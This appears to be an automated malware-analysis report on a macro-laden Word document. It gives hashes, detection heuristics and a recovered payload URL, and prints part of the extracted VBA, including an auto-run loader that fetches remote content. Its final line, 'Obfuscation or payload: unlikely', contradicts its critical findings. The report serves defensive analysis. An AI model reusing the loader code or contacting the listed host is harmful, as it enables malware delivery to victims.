Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4d6cae7b162bbe02…

MALICIOUS

Office (OOXML)

Size: 744.1 KB
Created: 2019-09-30 11:23:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-02-04
MD5: 1cab666691b1eebed7e5dafce5aea697
SHA-1: 9351542ab11b9770a4f7eb7cdec167d40476fe21
SHA-256: 4d6cae7b162bbe023af333c130819e6d1efb5506cf0ed5685294601ead5af226
Risk Score: 372

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The file contains a critical obfuscated auto-exec VBA loader with a Document_Open macro, indicating malicious intent. The VBA script attempts to download and execute a payload from the URL http://ikh63fd.imparisystems.com/UTRO.php. This is further supported by the embedded OLE object also containing a macro and pointing to the same URL.

Heuristics (10)

  • ClamAV: Doc.Malware.Ehrf-10008131-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Ehrf-10008131-0
  • Embedded Office object carries macros [critical] OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document, frequently under an obfuscated, non-standard part name, is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
  • VBA project inside OOXML [medium; 4 related findings] OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded OLE object [medium] OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) [info] OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream, stored literally (incl. UTF-16) or base64-encoded, which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL http://ikh63fd.imparisystems.com/UTRO.php: In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/main: In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography: In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml: In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/: In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#: In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/: In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/: In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/: In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#: In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#: In document text (OOXML body / shared strings)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9985 bytes
SHA-256: 753b04b799c1c13dc86848861086149289af1fc3bf8e24cfbcb0d0093214a624
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public Sub vSDtPv()
If Year(Date) = 2019 Then
hZWemp.grhgrgrg
End If
ThisDocument.Close
End Sub





Attribute VB_Name = "hZWemp"
Attribute VB_Base = "0{4888A8D6-9478-4555-AA01-426265E8A53C}{53624690-F57E-4A2D-9737-B47097B0914C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public kfAeXgL As String
Public hEorHPq As Object
Dim vlnmlgmrglpPP(309, 2) As String
Public Sub grhgrgrg()

On Error Resume Next

hZWemp.Hide

Set hEorHPq = CreateObject(fhvgut.Tag)

hEorHPq.navigate (hZWemp.yDsymL.Tag)

Do Until hEorHPq.readyState = 4

DoEvents

Loop

kfAeXgL = hEorHPq.Document.body.innerText

nxUVWWo

End Sub


'Replace accended chars with their plaintext alphabet counterparts


'Remove all shapes in the Active Document
Function DeleteShapes()
    Dim i As Long
    With ActiveDocument
    For i = .Shapes.Count To 1 Step -1
        With .Shapes(i)
            If .Type = msoAutoShape Then .Delete
        End With
    Next i
End With
End Function
'Save a new file from range Section within the parent file with fileName from Range Header within Section
Private Static Sub CopyAndSave(Section As Range, Header As Range, maxFileName As Integer)
    Dim name As String
    Header.Select
    Selection.ClearFormatting
    Dim D As Document
   
    'File name cannot contain \ / : * ? " < > |
    name = Replace(Header.Text, Chr(13), "")
    name = Application.CleanString(name)
    name = Replace(name, "\", "-")
    name = Replace(name, "/", "-")
    name = Replace(name, ":", "-")
    name = Replace(name, "?", "-")
    name = Replace(name, "*", "")
    name = Replace(name, """", "")
    name = Replace(name, "<", " ")
    name = Replace(name, ">", " ")
    name = Replace(name, "|", " ")
    name = Replace(name, "    ", "")
    name = Replace(name, Chr(10), "")
    name = Replace(name, Chr(13), "")
    name = Replace(name, Chr(9), "")
    name = Replace(name, "‘", "'")
    name = Replace(name, "’", "'")
    name = Replace(name, "“", "'")
    name = Replace(name, "”", "'")
    name = Replace(name, " ", "")
    name = Replace(name, "®", "(R)")
    name = Replace(name, "™", "(TM)")
    name = Replace(name, "™", "(TM)")
    name = Replace(name, "£", "(E)")
    name = Replace(name, " ", " ")
    name = Replace(name, "–", "-")
    name = Replace(name, "—", "-")
    name = Trim(name)
  
    'Debug.Print name
   
    'Reformatting Header
    Header.Select
    Selection.Font.Bold = True
    Selection.Font.Grow
    
    'Truncate File names to under maxFileName chars
    If (Len(name) > maxFileName) Then
        name = Left(name, maxFileName) & " ..."
    End If
    'Debug.Print "Saving: " & name
    
    Header.Copy
    Section.Copy
    
    'Saving Document
    Set D = Documents.Add
    D.Range.PasteAndFormat wdFormatOriginalFormatting
    With D.Content.Find
        .ClearFormatting
        .MatchWildcards = True
        .MatchCase = False
        .Text = "^13([1-9]).([1-9])*^13"
        .Replacement.ClearFormatting
        .Replacement.Text = ""
        .Execute Replace:=wdReplaceAll, Forward:=True, _
        Wrap:=wdFindContinue
    End With
    
    D.SaveAs2 FileName:=Section.Parent.Path & Application.PathSeparator & name & ".htm", _
    FileFormat:=wdFormatFilteredHTML
    D.Close
End Sub

'Remove all existing hyperlinks in a document.
Private Static Sub RemoveAllHyperlinks()
    Dim oField As Field
    For Each oField In ActiveDocument.Fields
        If oField.Type = wdFieldHyperlink Then
            oField.Unlink
        End If
    Next
    Set oField = Nothing
End Sub


P
... (truncated)
Filename: ooxml_oleobject_00.bin
Kind: ooxml-ole-object
Source: OOXML embedded OLE part: word/embeddings/_________Microsoft_Word_97-20031.doc
Size: 223232 bytes
SHA-256: 323fe57f6aa5b000b3eaa76049b1296c7794ae727d7b3ec54b6367a5e724bc34

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 14336 bytes
SHA-256: b1a7b3c0481646deaf6941c713b8191df65ddb36080d2e144e5fe9a83a78c1d2
Detection
ClamAV: Doc.Malware.Ehrf-10008131-0
Obfuscation or payload: unlikely